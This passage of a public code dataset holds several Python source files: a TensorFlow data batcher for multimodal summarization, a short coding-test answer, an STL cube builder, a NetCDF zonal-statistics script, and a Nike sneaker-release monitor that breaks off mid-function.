url_hash\n }\n\n if params.mode == \"train\":\n output[\"sim_img_feature\"] = sim_img_feature\n output[\"dissim_img_feature\"] = dissim_img_feature\n if \"SIMPAD\" in params.experiment and img_num < params.max_img_num:\n sim_padded_img_feature = tf.concat([img_feature,sim_img_feature[:(params.max_img_num - img_num),:]],axis = 0)\n output[\"img_feature\"] = sim_padded_img_feature\n yield output\n else:\n for _ in range(batch_size):\n yield output\n \n\n\n\n\ndef batch_generator(generator,raw_dataset,params,vocab,batch_size):\n output_types_dict = {\n \"enc_len\": tf.int32,\n \"enc_input\": tf.int32,\n \"enc_input_extend_vocab\": tf.int32,\n \"enc_mask\":tf.float32,\n \"article_oovs\": tf.string,\n \"dec_input\": tf.int32,\n \"target\": tf.int32,\n \"dec_len\": tf.int32,\n \"dec_mask\": tf.float32,\n \"article\": tf.string,\n \"abstract\": tf.string,\n \"abstract_sents\": tf.string,\n \"img_feature\": tf.float32,\n \"img_num\":tf.int32,\n \"img_mask\":tf.float32,\n \"url_hash\" : tf.string\n }\n \n if params.mode == \"train\":\n output_types_dict[\"sim_img_feature\"] = tf.float32\n output_types_dict[\"dissim_img_feature\"] = tf.float32\n \n dataset = tf.data.Dataset.from_generator(\n lambda: generator(raw_dataset,params,vocab,batch_size),\n output_types = output_types_dict)\n \n img_feature_dim=params.img_embed_dim\n padded_shapes_dict = {\"enc_len\": [],\n \"enc_input\": [None],\n \"enc_input_extend_vocab\": [None],\n \"enc_mask\":[None],\n \"article_oovs\": [None],\n \"dec_input\": [params.max_dec_steps],\n \"target\": [params.max_dec_steps],\n \"dec_len\": [],\n \"dec_mask\":[params.max_dec_steps],\n \"article\": [],\n \"abstract\": [],\n \"abstract_sents\": [None],\n \"img_feature\":[None,img_feature_dim],\n \"img_num\":[],\n \"img_mask\":[None],\n \"url_hash\" : []\n }\n padding_values_dict = {\"enc_len\": -1,\n \"enc_input\": vocab.word2id(data.PAD_TOKEN),\n \"enc_input_extend_vocab\": vocab.word2id(data.PAD_TOKEN),\n \"enc_mask\":0.0,\n \"article_oovs\": b'',\n \"dec_input\": vocab.word2id(data.PAD_TOKEN),\n \"target\": vocab.word2id(data.PAD_TOKEN),\n \"dec_len\": -1,\n \"dec_mask\":0.0,\n \"article\": b\"\",\n \"abstract\": b\"\",\n \"abstract_sents\": b'',\n \"img_feature\":0.0,\n \"img_num\":-1,\n \"img_mask\":0.0,\n \"url_hash\" : b\"\"\n }\n \n if params.mode == \"train\":\n padded_shapes_dict[\"sim_img_feature\"] = [None,img_feature_dim]\n padded_shapes_dict[\"dissim_img_feature\"] = [None,img_feature_dim]\n padding_values_dict[\"sim_img_feature\"] = 0.0\n padding_values_dict[\"dissim_img_feature\"] = 0.0\n \n dataset = dataset.padded_batch(batch_size, padded_shapes=(padded_shapes_dict),\n padding_values=padding_values_dict,\n drop_remainder=True)\n def update(record):\n encoder_input_dict = {\"enc_input\": record[\"enc_input\"],\n \"extended_enc_input\": record[\"enc_input_extend_vocab\"],\n \"article_oovs\": record[\"article_oovs\"],\n \"enc_len\": record[\"enc_len\"],\n \"enc_mask\":record[\"enc_mask\"],\n \"article\": record[\"article\"],\n \"max_oov_len\": tf.shape(record[\"article_oovs\"])[1],\n \"img_feature\":record[\"img_feature\"],\n \"img_num\":record[\"img_num\"],\n \"img_mask\":record[\"img_mask\"],\n \"url_hash\" : record[\"url_hash\"]\n }\n decoder_input_dict ={\"dec_input\": record[\"dec_input\"],\n \"dec_target\": record[\"target\"],\n \"dec_len\": record[\"dec_len\"],\n \"dec_mask\":record[\"dec_mask\"],\n \"abstract_sents\" : record[\"abstract_sents\"],\n \"abstract\": record[\"abstract\"]}\n if params.mode == \"train\":\n encoder_input_dict[\"sim_img_feature\"] = record[\"sim_img_feature\"]\n encoder_input_dict[\"dissim_img_feature\"] = record[\"dissim_img_feature\"]\n if \"SIMPAD\" in params.experiment or \"TS\" in params.experiment:\n #In SIMPAD all the images needs to be considered and no masking is done during attention computation\n #Since original images are not considered in \"DSC_MSMO-TS\" so we consider all similar/dissimilar images\n batch_max_img_num = params.max_img_num\n else:\n batch_max_img_num = tf.reduce_max(record[\"img_num\"])\n sim_ones = tf.ones([params.batch_size,batch_max_img_num], dtype = tf.int32)\n dissim_zeros = tf.zeros([params.batch_size,batch_max_img_num],dtype=tf.int32)\n decoder_input_dict[\"dsc_target\"] = tf.concat([sim_ones, dissim_zeros], axis = -1)\n \n return (encoder_input_dict, decoder_input_dict)\n \n AUTOTUNE = tf.data.experimental.AUTOTUNE\n dataset = dataset.map(update, num_parallel_calls=AUTOTUNE)\n return dataset\n\n\n\nclass batcher:\n def __init__(self,data_path, img_feature_path,sim_img_feature_path, dissim_img_feature_path, vocab):\n self.data_path=data_path\n self.img_feature_path=img_feature_path\n self.sim_img_feature_path = sim_img_feature_path\n self.dissim_img_feature_path = dissim_img_feature_path\n self.vocab=vocab\n \n def get_batched_dataset(self,params,batch_size, logger):\n '''Returns Batched dataset as per batch size and other parameters'''\n if params.mode == \"train\":\n raw_dataset = tf.data.Dataset.from_generator(lambda: raw_record_generator(self.data_path, self.img_feature_path, logger, self.sim_img_feature_path, self.dissim_img_feature_path),\n output_types=(tf.string, tf.string,tf.string,tf.float32, tf.float32, tf.float32))\n else:\n raw_dataset = tf.data.Dataset.from_generator(lambda: raw_record_generator(self.data_path, self.img_feature_path),\n output_types=(tf.string, tf.string,tf.string,tf.float32))\n AUTOTUNE = tf.data.experimental.AUTOTUNE\n # raw_dataset= raw_dataset.cache().prefetch(buffer_size=AUTOTUNE)\n if not params.single_pass:\n # We repeat and shuffle the dataset only during train mode\n raw_dataset=raw_dataset.shuffle(1000, reshuffle_each_iteration=True).repeat()\n dataset=batch_generator(example_generator,raw_dataset,params,self.vocab,batch_size)\n dataset=dataset.prefetch(buffer_size=AUTOTUNE)\n return dataset\n","repo_name":"mailsourajit25/Topic-Aware-Multimodal-Summarization","sub_path":"batcher.py","file_name":"batcher.py","file_ext":"py","file_size_in_byte":15444,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"32914716569","text":"# 코딩은 체육과목 입니다\n\nnum = int(input())\n\nif (num % 4 == 0) :\n N = int(num / 4)\n for i in range(N) :\n print(\"long\", end = \" \")\n print(\"int\")\nelse :\n print(\"N은 4의 배수여야 한다.\")","repo_name":"arinming/CodingTest","sub_path":"Python/백준/Step3/25314.py","file_name":"25314.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"8176309113","text":"import numpy as np\nfrom stl import mesh\n\ndef create_cube(origin, dimensions):\n vertices = np.array([\n [0, 0, 0],\n [1, 0, 0],\n [1, 1, 0],\n [0, 1, 0],\n [0, 0, 1],\n [1, 0, 1],\n [1, 1, 1],\n [0, 1, 1]], dtype=np.float64)\n\n vertices *= dimensions\n vertices += origin\n\n faces = np.array([\n [0,3,1],\n [1,3,2],\n [0,4,7],\n [0,7,3],\n [4,5,6],\n [4,6,7],\n [5,1,2],\n [5,2,6],\n [2,3,6],\n [3,7,6],\n [0,1,5],\n [0,5,4]])\n\n cube = mesh.Mesh(np.zeros(faces.shape[0], dtype=mesh.Mesh.dtype))\n for i, f in enumerate(faces):\n for j in range(3):\n cube.vectors[i][j] = vertices[f[j],:]\n\n return cube\n","repo_name":"Zeddi92/nuclide_chart_print","sub_path":"geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10747717857","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\nfrom rasterstats import zonal_stats\nfrom netCDF4 import Dataset, num2date,date2num\nfrom joblib import Parallel, delayed\nfrom datetime import datetime\nimport os\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ntry:\n ddirDB = getattr(settings, \"DIRDB\", None)\nexcept ImproperlyConfigured:\n ddirDB = os.path.expanduser('~') + \"/Bureau/teledm/donnees\"\n\n\n\ndef calc_stats(rx,ry,gdf,ndist,trsfm,tps):\n # fonction calculant les stats à partir de la géodatabase(gdf). rx,ry = reso spatiale, ndist=nb de districts, trsfm=géométrie de la matrice de la variable, tps=matrice des dates\n # matrices vides aux dimensions du \"bloc temporel\" (len(tps) correspond à l'axe 0 de la mat tps) et du nombre de districts/aires/pays (ndist)\n nb_px = np.zeros((len(tps),ndist))\n nb_px[:] = np.nan\n v_max = np.zeros((len(tps),ndist))\n v_max[:] = np.nan\n v_mean = np.zeros((len(tps),ndist))\n v_mean[:] = np.nan\n v_med = np.zeros((len(tps),ndist))\n v_med[:] = np.nan\n v_min = np.zeros((len(tps),ndist))\n v_min[:] = np.nan\n v_std = np.zeros((len(tps),ndist))\n v_std[:] = np.nan\n for i in range(len(tps)):\n # \"micro-pixelisation\" pour obtenir une pseudo-résolution plus fine, adéquate au découpage district/aire\n var1 = np.repeat(tps[i,...],100*ry, axis=0)\n var2 = np.repeat(var1,100*rx, axis=1)\n val_input=np.ma.masked_array(var2, np.isnan(var2))\n stats = zonal_stats(gdf['geometry'],val_input, transform=trsfm, stats=['min', 'max', 'mean', 'count', 'std', 'median'])#fonction stat du module rasterstats\n df = gdf.join(pd.DataFrame(stats))# chargement des stats dans la geodataframe\n # argement des stats dans les différentes matrices\n nb_px[i,:] = np.array(df['count'].ix[:])\n v_max[i,:] = np.array(df['max'].ix[:])\n v_mean[i,:] = np.array(df['mean'].ix[:])\n v_med[i,:] = np.array(df['median'].ix[:])\n v_min[i,:] = np.array(df['min'].ix[:])\n v_std[i,:] = np.array(df['std'].ix[:])\n return nb_px,v_max,v_mean,v_med,v_min,v_std\n\n\n\n\ndef calc_moy(ncfile,fshape,deb,fin,sat,varname,level):\n # traitement des dates\n datedeb = datetime.strptime(deb,\"%Y-%m-%d\")\n datefin = datetime.strptime(fin,\"%Y-%m-%d\")\n \n \n geodf = gpd.GeoDataFrame.from_file(fshape)\n \n nbdist = len(geodf[geodf.columns[1]]) # nombre de districts/aires \n\n nbpx_tmp = []\n vmin_tmp = []\n vmax_tmp = []\n vmean_tmp = []\n vstd_tmp = []\n vmed_tmp = []\n nc = Dataset(ncfile, 'r')\n var_in = nc.variables[varname]\n dates = nc.variables['time']\n # definition des dates de début et fin en format numérique, à partir de l'unité de temps du .nc\n ndatedeb = date2num(datedeb,dates.units)\n ndatefin = date2num(datefin,dates.units)\n if datetime.strftime(num2date(dates[0],dates.units),\"%H\") != \"0\": # condition qui vérifie l'heure de la donnée(0h, 3h,6h,...)\n ndatedeb += 24-int(datetime.strftime(num2date(dates[0],dates.units),\"%H\"))\n ndatefin += 24-int(datetime.strftime(num2date(dates[0],dates.units),\"%H\"))\n # détermination des indices des dates debut et fin dans la matrice\n iddeb = np.abs(dates[:]-ndatedeb).argmin()\n idfin = np.abs(dates[:]-ndatefin).argmin()-1\n # extraction du bloc de dates et ajout à la variable time(tp) du newnc\n serie_dates = dates[iddeb:idfin+1]\n\n if level == -1:\n var = np.array(var_in[iddeb:idfin+1,...])\n else:\n var = np.array(var_in[iddeb:idfin+1,level,...])\n # traitement de la matrice avec fillvalue, scalefactor et addoffset\n if sat == 'toms':\n var[var==var_in._FillValue]=-999\n else:\n \tvar[var==var_in._FillValue]=np.nan\n if \"scale_factor\" in var_in.ncattrs():\n var = (var[:]-var_in.add_offset)*var_in.scale_factor\n # définition des caractéristiques géographiques transform,resolution spatiale, lat max et lon min\n lat = nc.variables['latitude'][:]\n lon = nc.variables['longitude'][:]\n xo = min(lon)\n yo = max(lat)\n resx = np.abs(np.mean(np.diff(lon)))\n resy = np.abs(np.mean(np.diff(lat)))\n transform = [xo, 0.01, 0.0, yo, 0.0, -0.01]\n\n #############################################################################################################\n #############################################################################################################\n idt = len(serie_dates)//8\n if idt == 0:\n idt = 1\n ndt = range(0,len(serie_dates),idt)\n nb_mat_in = [var[ix:ix+(idt),...] for ix in ndt]# decoupage de la matrice en blocs de 26 jours\n res = Parallel(n_jobs=-1)(delayed(calc_stats)(resx,resy,geodf,nbdist,transform,temps_x) for temps_x in nb_mat_in)# appel de la fonction calc_stats avec parallélisation\n # chargement des calculs dans les variables temporaires\n nbpx_tmp.append(np.concatenate([res[n][0] for n in range(0,len(ndt))], axis=0))\n vmax_tmp.append(np.concatenate([res[n][1] for n in range(0,len(ndt))], axis=0))\n vmean_tmp.append(np.concatenate([res[n][2] for n in range(0,len(ndt))], axis=0))\n vmed_tmp.append(np.concatenate([res[n][3] for n in range(0,len(ndt))], axis=0))\n vmin_tmp.append(np.concatenate([res[n][4] for n in range(0,len(ndt))], axis=0))\n vstd_tmp.append(np.concatenate([res[n][5] for n in range(0,len(ndt))], axis=0))\n\n \n index = [num2date(d,dates.units).date() for d in serie_dates]\n columns_name = geodf.name.values.tolist()\n tmpvar_dict = {\"nbpx\":nbpx_tmp,\"vmax\":vmax_tmp,\"vmean\":vmean_tmp,\"vmin\":vmin_tmp,\"vstd\":vstd_tmp}\n list_df = {}\n for n in tmpvar_dict:\n list_df[n] = pd.DataFrame (np.concatenate([tmpvar_dict[n][d_t] for d_t in range(0,len(tmpvar_dict[n]))], axis=0), index=index, columns=columns_name).round(4)\n #df.to_csv(ddirout+'/'+output[:-3]+'_'+n+'.csv', header=True)\n nc.close()\n return list_df\n\nif __name__ == \"__main__\":\n \n ddirout = os.path.join(os.path.expanduser('~'), \"dev/crc/teledm/tmp\")\n deb = \"2007-01-01\" #\"1979\" a ...\n fin = \"2007-01-15\"\n pays = \"burkina\" #\"burkina\",\"mali\",\"niger\",\"senegal\"\n niveau = \"district\" #\"pays\",\"district\",\"aire\"\n types = \"satellite\" #\"satellite\",\"re_analyse\"\n sat = \"modis\" #\"modis\",\"aura_omi\",\"ecmwf\",\"msg\"\n prod = \"MYD07\" #\"MYD04\",\"MYD05\",\"MYD07\",\"omaeruv\",\"seviri_aerus\",\"macc\",\"era_interim\"\n res_temp = \"w\" #\"d\",\"w\",\"m\",\"t\"\n res = \"res009\" #\"003\",\"005\",\"009\",\"025\",\"075\",\"125\"\n varname = 'Total_Ozone'\n shape = \"merge2500\" # \"all_fs\" \"merge1500\" \"merge2500\"\n \n ldf = calc_moy(ddirout,deb,fin,pays,niveau,types,sat,prod,res_temp,res,varname,shape)\n","repo_name":"jsdelivrbot/web1","sub_path":"teledm/moy_dist_parallel1.py","file_name":"moy_dist_parallel1.py","file_ext":"py","file_size_in_byte":6916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17578994292","text":"# For regions that do not use the standard API\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\nimport traceback\n\nimport asyncio\nfrom pyppeteer import launch\nfrom pyppeteer_stealth import stealth\n\n___standard_api___ = [\n 'GB', 'US', 'AU', 'AT', 'BE', 'BG', 'CA', 'CN', 'HR', 'CZ', 'DK', 'EG', \n 'FI', 'FR', 'DE', 'HU', 'IN', 'ID', 'IE', 'IT', 'MY', 'MX', 'MA', 'NL', \n 'NZ', 'NO', 'PH', 'PL', 'PT', 'PR', 'RO', 'RU', 'SA', 'SG', 'SI', 'ZA', \n 'ES', 'SE', 'CH', 'TR', 'AE', 'VN', 'JP' \n]\n\n\nasync def get_content(url, user_agent, proxy):\n browser = await launch()\n page = await browser.newPage()\n await stealth(page)\n await page.emulate({\n 'userAgent': user_agent,\n 'viewport': {\n 'width': 414,\n 'height': 736,\n 'deviceScaleFactor': 3,\n 'isMobile': True,\n 'hasTouch': True,\n 'isLandscape': False\n }\n })\n await page.goto(url)\n content = await page.content()\n await page.close()\n return content\n\n\ndef standard_api(ITEMS, LOCATION, LANGUAGE, user_agent, proxy, KEYWORDS, start):\n headers = {\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-GB,en;q=0.9',\n 'appid': 'com.nike.commerce.snkrs.web',\n 'content-type': 'application/json; charset=UTF-8',\n 'dnt': '1',\n 'nike-api-caller-id': 'nike:snkrs:web:1.0',\n 'origin': 'https://www.nike.com',\n 'referer': 'https://www.nike.com/',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-site',\n 'user-agent': user_agent,\n 'Cache-Control': 'no-cache, no-store, must-revalidate',\n 'Pragma': 'no-cache',\n 'Expires': '0'\n }\n to_discord = []\n\n anchor = 0\n while anchor < 160:\n url = f'https://api.nike.com/product_feed/threads/v3/?anchor={anchor}&count=50&filter=marketplace%28{LOCATION}%29&filter=language%28{LANGUAGE}%29&filter=channelId%28010794e5-35fe-4e32-aaff-cd2c74f89d61%29&filter=exclusiveAccess%28true%2Cfalse%29'\n html = requests.get(url=url, timeout=20, verify=False, headers=headers, proxies=proxy)\n output = json.loads(html.text)\n\n # Stores details in array\n for item in output['objects']:\n try:\n for product in item['productInfo']:\n if (product['availability']['available'] == True) and (product['merchProduct']['status'] == 'ACTIVE'):\n if KEYWORDS == []:\n first = 0\n sizes = ''\n for k in product['availableGtins']:\n stored = [product['productContent']['fullTitle'], product['productContent']['colorDescription'], k['gtin']]\n if k['available'] == True:\n if stored in ITEMS:\n pass\n else:\n ITEMS.append(stored)\n \n for s in product['skus']:\n if first == 0:\n if s['gtin'] == k['gtin']:\n sizes = str(s['nikeSize']) + ': ' + str(k['level'])\n first = 1\n break\n else:\n if s['gtin'] == k['gtin']:\n sizes += '\\n' + str(s['nikeSize']) + ': ' + str(k['level'])\n break\n else:\n if stored in ITEMS:\n ITEMS.remove(stored)\n \n if sizes != '' and start == 0:\n print('Sending notification to Discord...')\n to_discord.append(dict(\n title=product['productContent']['fullTitle'],\n description=product['productContent']['colorDescription'],\n url='https://www.nike.com/' + LOCATION + '/launch/t/' + product['productContent']['slug'],\n thumbnail=item['publishedContent']['nodes'][0]['nodes'][0]['properties']['squarishURL'],\n price=str(product['merchPrice']['currentPrice']),\n style_code=str(product['merchProduct']['styleColor']),\n sizes=sizes))\n\n else:\n for key in KEYWORDS:\n if key.lower() in product['merchProduct']['labelName'].lower() or key.lower() in product['productContent']['colorDescription'].lower():\n first = 0\n sizes = ''\n for k in product['availableGtins']:\n stored = [product['productContent']['fullTitle'], product['productContent']['colorDescription'], k['gtin']]\n if k['available'] == True:\n if stored in ITEMS:\n pass\n else:\n ITEMS.append(stored)\n \n for s in product['skus']:\n if first == 0:\n if s['gtin'] == k['gtin']:\n sizes = str(s['nikeSize']) + ': ' + str(k['level'])\n first = 1\n break\n else:\n if s['gtin'] == k['gtin']:\n sizes += '\\n' + str(s['nikeSize']) + ': ' + str(k['level'])\n break\n else:\n if stored in ITEMS:\n ITEMS.remove(stored)\n \n if sizes != '' and start == 0:\n print('Sending notification to Discord...')\n to_discord.append(dict(\n title=product['productContent']['fullTitle'],\n description=product['productContent']['colorDescription'],\n url='https://www.nike.com/' + LOCATION + '/launch/t/' + product['productContent']['slug'],\n thumbnail=item['publishedContent']['nodes'][0]['nodes'][0]['properties']['squarishURL'],\n price=str(product['merchPrice']['currentPrice']),\n style_code=str(product['merchProduct']['styleColor']),\n sizes=sizes))\n except KeyError:\n pass\n\n except:\n print(traceback.format_exc())\n\n anchor += 50\n \n return to_discord\n\n \ndef brazil(ITEMS, LOCATION, LANGUAGE, user_agent, proxy, KEYWORDS, start):\n # need to bs4 \n url = 'https://www.nike.com.br/Snkrs/Feed?p=2&demanda=true'\n headers = {\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n 'sec-fetch-dest': 'document',\n 'sec-fetch-mode': 'navigate',\n 'sec-fetch-site': 'none',\n 'sec-fetch-user': '?1',\n 'upgrade-insecure-requests': '1',\n 'user-agent': user_agent,\n 'Cache-Control': 'no-cache, no-store, must-revalidate',\n 'Pragma': 'no-cache',\n 'Expires': '0'\n }\n to_discord = []\n html = requests.get(url=url, headers=headers, proxies=proxy)\n soup = BeautifulSoup(html.text, 'html.parser')\n output = soup.find_all('div', {'class': 'produto produto--esgotado'})\n for product in output:\n if KEYWORDS == []:\n item = dict(\n title=product.find('h2', {'class': 'produto__detalhe-titulo'}).text,\n description=None,\n url=product.find('div', {'class': 'produto__imagem'})['href'],\n thumbnail=product.find('div', {'class': 'produto__imagem'})['src'],\n price=None,\n style_code=None,\n sizes=None\n )\n\n if item in ITEMS:\n pass\n elif start == 0:\n to_discord.append(item)\n start = 1\n \n else:\n for key in KEYWORDS:\n if key.lower() in product.find('h2', {'class': 'produto__detalhe-titulo'}).text.lower():\n item = dict(\n title=product.find('h2', {'class': 'produto__detalhe-titulo'}).text,\n description=None,\n url=product.find('div', {'class': 'produto__imagem'})['href'],\n thumbnail=product.find('div', {'class': 'produto__imagem'})['src'],\n price=None,\n style_code=None,\n sizes=None\n )\n\n if item in ITEMS:\n pass\n elif start == 0:\n to_discord.append(item)\n start = 1\n\n return to_discord\n\n\n\ndef chile(ITEMS, LOCATION, LANGUAGE, user_agent, proxy, KEYWORDS, start):\n url = 'https://www.nike.cl/api/catalog_system/pub/products/search?&_from=0&_to=49'\n to_discord = []\n html = asyncio.get_event_loop().run_until_complete(get_content(url, user_agent, proxy))\n html = html.replace('